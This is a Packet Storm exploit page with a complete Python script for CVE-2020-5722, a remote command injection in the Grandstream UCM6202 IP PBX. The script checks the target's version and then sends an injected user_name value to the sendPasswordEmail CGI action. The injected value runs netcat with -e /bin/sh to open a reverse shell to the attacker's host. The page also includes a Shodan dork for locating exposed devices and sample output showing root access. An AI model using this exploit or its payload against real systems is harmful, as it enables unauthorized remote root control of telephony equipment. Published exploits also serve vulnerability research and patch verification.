what you don't know can hurt you

UCM6202 1.0.18.13 Remote Command Injection

UCM6202 1.0.18.13 Remote Command Injection
Posted Mar 24, 2020
Authored by Jacob Baines

UCM6202 version 1.0.18.13 suffers from a remote command injection vulnerability.

tags | exploit, remote
advisories | CVE-2020-5722
MD5 | 7d50b84e68d6c850d1dcfb7448b659db

UCM6202 1.0.18.13 Remote Command Injection

Change Mirror Download
# Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection
# Date: 2020-03-23
# Exploit Author: Jacob Baines
# Vendor: http://www.grandstream.com
# Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series
# Tested on: UCM6202 1.0.18.13
# CVE : CVE-2020-5722
# Shodan Dork: ssl:"Grandstream" "Set-Cookie: TRACKID"
# Advisory: https://www.tenable.com/security/research/tra-2020-15
#
# Sample output:
# albinolobster@ubuntu:~$ python3 pbx_sploit.py --rhost 192.168.2.1 --lhost 192.168.2.107
# [+] Sending getInfo request to https://192.168.2.1:8089/cgi
# [+] Remote target info:
# -> Model: UCM6202
# -> Version: 1.0.18.13
# [+] Vulnerable version!
# [+] Sending exploit. Reverse shell to 192.168.2.107:1270
#
# albinolobster@ubuntu:~$ nc -lvp 1270
# Listening on [] (family 2, port)
# Connection from _gateway 41675 received!
# whoami
# root
# uname -a
# Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
##

import os
import re
import sys
import json
import argparse
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8089)
top_parser.add_argument('--lhost', action="store", dest="lhost",
required=True, help="The local host to connect back to")
top_parser.add_argument('--lport', action="store", dest="lport", type=int,
help="The local port to connect back to", default=1270)
args = top_parser.parse_args()


url = 'https://' + args.rhost + ':' + str(args.rport) + '/cgi'
print('[+] Sending getInfo request to ', url)

try:
resp = requests.post(url=url, data='action=getInfo', verify=False)
except Exception:
print('[-] Error connecting to remote target')
sys.exit(1)

if resp.status_code != 200:
print('[-] Did not get a 200 OK on getInfo request')
sys.exit(1)

if resp.text.find('{ "response":') != 0:
print('[-] Unexpected response')
sys.exit(1)

try:
parsed_response = json.loads(resp.text)
except Exception:
print('[-] Unable to parse json response')
sys.exit(1)

print('[+] Remote target info: ')
print('\t-> Model: ', parsed_response['response']['model_name'])
print('\t-> Version: ', parsed_response['response']['prog_version'])

match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
parsed_response['response']['prog_version'])
if not match:
print('[-] Failed to extract the remote targets version')
sys.exit(1)

major = int(match[1])
minor = int(match[2])
point = int(match[3])
patch = int(match[4])

if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
20):
print('[-] Unaffected version')
sys.exit(1)
else:
print('[+] Vulnerable version!')

print('[+] Sending exploit. Reverse shell to %s:%i' % (args.lhost,
args.lport))
try:
exploit = 'admin\' or 1=1--`;`nc${IFS}' + args.lhost + '${IFS}' +
str(args.lport) + '${IFS}-e${IFS}/bin/sh`;`'
resp = requests.post(url=url,
data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
except Exception as err:
print('[-] Failed to send payload')
sys.exit(1)

if resp.status_code != 200:
print('[-] Did not get a 200 OK on sendPasswordEmail request')
sys.exit(1)

try:
parsed_response = json.loads(resp.text)
except Exception:
print('[-] Unable to parse json response')
sys.exit(1)

if parsed_response['status'] == 0:
print('[+] Success! Clean exit.')
else:
print('[-] Something bad happened.')
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close